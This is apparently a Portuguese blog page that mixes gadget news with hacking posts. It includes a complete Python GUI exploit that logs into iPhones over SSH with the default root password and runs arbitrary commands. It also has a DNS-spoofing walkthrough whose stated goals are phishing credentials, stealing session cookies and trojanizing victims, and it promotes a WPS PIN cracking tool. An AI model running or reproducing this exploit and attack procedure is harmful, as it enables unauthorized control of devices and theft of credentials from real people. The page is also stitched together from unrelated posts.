Baratas robóticas controladas pelo iPhone

 

gokiraji-cockroach-bug-rc-toy-iphone-ipad-1

As baratas robóticas Goki-Raji só poderiam ter sido inventadas no Japão. Elas são controladas pelo iPhone ou pelo iPad com a ajuda de um pequeno acessório. Se você está procurando alguma utilidade prática, saiba que ela não existe, além dos potenciais sustos nas suas amigas que odeiam baratas mais do que tudo no planeta.

Saiba mais sobre as baratas japonesas na Japan Trend Shop.

Se ao invés de baratas o seu negócio for centopéias, sem problemas, confira estas aqui, feitas pela mesma empresa lá no Blog de Brinquedo!

Via Akihabara News.

Clique abaixo para ver um vídeo das baratas robóticas em ação.

Fonte:DigitalDrops

Window Washing Robot, o Robô que Lava Janelas

 

Window-Washing-Robot

Quando o mundo estiver dominado pelos robôs, no futuro distante, os poucos sobreviventes não vão lembrar que o apocalipse começou com máquinas simples como este novo e utilíssimo robô inteligente que lava janelas!

Window Washing Robot é o primeiro robô do mundo capaz de limpar automaticamente vidros de qualquer espessura usando uma poderosa bomba de vácuo para prendê-lo no vidro e dois motores que movimentam as esteiras antiderrapantes. O robô calcula automaticamente o tamanho do vidro e a rota mais eficiente para limpá-lo (por isso é “inteligente”). Perfeito para quem mora em andares altos!

O Window Washing Robot custa US$399,99 na pré-venda da Sharper Image

Fonte:DigitalDrops

Exploit: IOS Remote Command Execution via ssh

Os dispositivos iOS permitem executar código remoto mediante ssh, D35m0nd142 fez um exploit demostrando esta ação.

 

Compartilho o link do 1137day e o código.

http://1337day.com/exploits/14805

#!/usr/bin/python
# When you've launched the command look the terminal
# This software work without Metasploit 
# Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit
# Exploit Author: D35m0nd142
# Vendor Homepage: http://www.apple.com
# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium

import paramiko 
import Tkinter 
from tkMessageBox import *
import sys
import os
print "******************************************************************"
print "*Apple iPhone iOS Default SSH Remote Command Execution exploit   *"
print "*                 Created by D35m0nd142                          *"
print "******************************************************************\n" 

root=Tkinter.Tk()
root.geometry("%dx%d" % (490,220))
def exploit():
 ssh = paramiko.SSHClient()
 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 ip_iphone=ip.get()
 ssh.connect(ip_iphone,username='root',password='alpine')
 cmd=command.get()
 stdin, stdout, stderr = ssh.exec_command(cmd)
 print stdout.readlines()
 ok=Tkinter.Label(text="Command executed",bg="blue",fg="yellow").pack() 
 ssh.close()

root['bg']="black"
root.title("Apple iOS Default SSH Remote Command Execution exploit")
message=showwarning("Warning","D35m0nd142 isn't responsable for your use of this software")
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_label=Tkinter.Label(text="iPhone IP: ").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
command_label=Tkinter.Label(text="Command to execute: ").pack()
command=Tkinter.StringVar()
command_entry=Tkinter.Entry(textvariable=command).pack()
launch_exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
root.mainloop()

Hacking Exposed 7: Network Security Secrets & Solutions, Seventh Edition

HAcking Exposed já virou sinônimo de livros sobre segurança e qualidade. A editora responsável se preocupa em muito no mantenimento de suas edições sempre atualizadas e escritas por profissionais de peso, com bagagem técnica.

Este livro, o qual poderá ser consultado a partir do seguinte link, é recomendado para aqueles que desejam aprender um pouco mais sobre segurança da informação.

Fonte:CorujaTI

DNS Spoofing

Hoje queremos ensinar o método DNS Spoofing como uma vítima sendo enganado, a fim de conseguir encaminhá-lo para um endereço IP que nos interessa. Por que pode ser interessante? fácil:

  • Conseguir lançar um exploit contra a vítima.
  • Mostrar um site falso e pegar suas credenciais.
  • Obter o cookie de sessão da vítima.
  • Ou … todos juntos … ou seja, vamos mostrar um site falso, pegamos a senha, e nós jogamos um exploit, o que obviamente é o navegador vulnerável e troyanizamos sua máquina sem que você perceba que você enviar para o site original, de modo que você não sabe que algo está errado … O que você acha? Agora que é pura … arte!

Scenario

  • Uma vítima com o Microsoft Windows XP SP3 e usa um servidor DNS externo na rede local, como o Google DNS 8.8.8.8.
  • Um invasor com Kali Linux.
  • Agressor e vítima estão na mesma LAN. O atacante irá interceptar solicitações e respostas DNS, fornecendo o endereço IP que ele quer através da construção de um arquivo hosts especial.

Realizada pela primeira vez ataque MITM à vítima através de ARP Spoofing. Uma vez que o tráfego flui através do atacante, construímos um arquivo hosts a serem passados ​​para dnsspoof. Este arquivo especifica os endereços IP acordes para os nomes de domínio que você deseja spoof. O trecho a seguir simula o arquivo de texto editado:

 

192.168.0.57 *.tuenti.com
192.168.0.57 tuenti.com

Depois de ter criado o arquivo que você deve executar a ferramenta com a seguinte sintaxe dnsspoof

dnsspoof –i eth0 –f <fichero de hosts>.

 

Desta maneira simples você pode fazer um phishing quase perfeito, considerando que o site é um clone do original. Por outro lado, a vítima pode detectar este caso para verificar o status do seu cache considera que a resolução de nomes de domínio para Tuenti ter ficado em um endereço IP local, que surpresa e tanto para o usuário final.

Finalmente, indicam que a técnica é bastante simples e interessante. Tenha cuidado com suas máquinas de LAN como realizar este tipo de ataque é muito simples. :D :D

WPSCRACKGUI – GRAPHICAL TOOL FOR CRACKING WPS WIRELESS PIN

changelog v1.2.1 :
* The Portuguese language was added.
* Was added the Kozumi Keygen.
* Was added the Edimax Keygen.
* Was added the Belkin Keygen.
* Was added the Nisuta Keygen.
* Update Database to: # 301 Pines, # 120 MAC Address.
* Fixed bugs in General.
Graphical interface to the network cracking WPS Reaver.
wps_crack_gui1features :
  • Graphic User Interface (GUI) WPS encryption cracking.
  • Advanced Attack with Generic Dictionary.
  • Advanced Dictionary Attack with Enhanced.
  • Updated Assisted Reaver-WPS.
  • Database with PINs.
  • Change MAC Address.
  • Supported in Gt and Gtk.
  • Scan networks.
Fonte:Kembolle

HACKING WEB APPS

Wowebook é foda. Ele sempre libera bons livros para galera que gosta de estudar da forma auto ditada. Essa semana o site liberou uma excelente coletânea focada em segurança. Mas agora falaremos de um livro focado em Web Apps

HACKING WEB APPS é um livro que precisa ser lido por todos aqueles que pensam em mexer com segurança focada para aplicações Web. Ele trás uma série de exemplos e explicações que serão a sua base de conhecimento.

Veja os temas abordados em seus capítulos:

  • SQL Injection
  • Cross Site Scripting
  • Logic Attacks
  • Server Misconfigurations
  • Predictable Pages
  • Web of Distrust
  • Breaking Authentication Schemes
  • HTML5 Security Breaches
  • Attacks on Mobile Apps
  • Even if you don’t develop web sites or write HTML

Vejam que praticamente cada capítulo é um tipo de ataque. O livro poderá ser consultado a partir do seguinte link.

Boa leitura.

Fonte:CorujadeTI

Luminária USB em Forma de Lâmpada Incandescente

 

Bright-Idea-USB-Lightbulb

Existem muitos notebooks sem iluminação no teclado e escrever no escuro com um computador desses vira uma tarefa complicada de adivinhação. Para isto existem muitas opções de luzes USB disponíveis no mercado de vários tipos diferentes, mas este modelo da Mustard tem um design incrível e bem familiar.

Bright Idea USB Lightbulb tem a forma de uma lâmpada incandescente que todos conhecemos, presa num braço articulado, e com uma iluminação azul suave, que não vai atrapalhar a visão da tela.

O Bright Idea USB Lightbulb custa £10 na pré-venda da Mustard.

Fonte:DigitalDrops

Fone de Ouvido Bluetooth com Touchpad

 

Finger-Swipe-Headphones

Os fones de ouvido Bluetooth têm um problema comum, a dificuldade em encontrar e acertar os botões desejados sem olhar, só com a mão. Os erros são comuns e em vez de diminuir, você aumenta o som ou desliga, quando quer pular a música.

Finger Swipe Headphones acaba com o problema da maneira mais óbvia possível, elimina os botões e usa toda a superfície do fone sensível ao toque. O fone esquerdo funciona como um touchpad para controlar a música arrastando o dedo na superfície: ao deslizar o dedo para cima e para baixo é possível aumentar ou diminuir o som e arrastando o dedo horizontalmente faz a música avançar ou retroceder. Excelente ideia!

Finger Swipe Headphones vem com microfone, desliga a música automaticamente ao receber uma ligação e é equipado com dois drivers 40mm com frequência de resposta de 20Hz a 2KHz. O fone é dobrável e tem 10 horas de autonomia com a carga completa.

O par de fones de ouvido Finger Swipe Headphones custa US$149,95 na Hammacher Schlemmer.

Fonte:DigitalDrops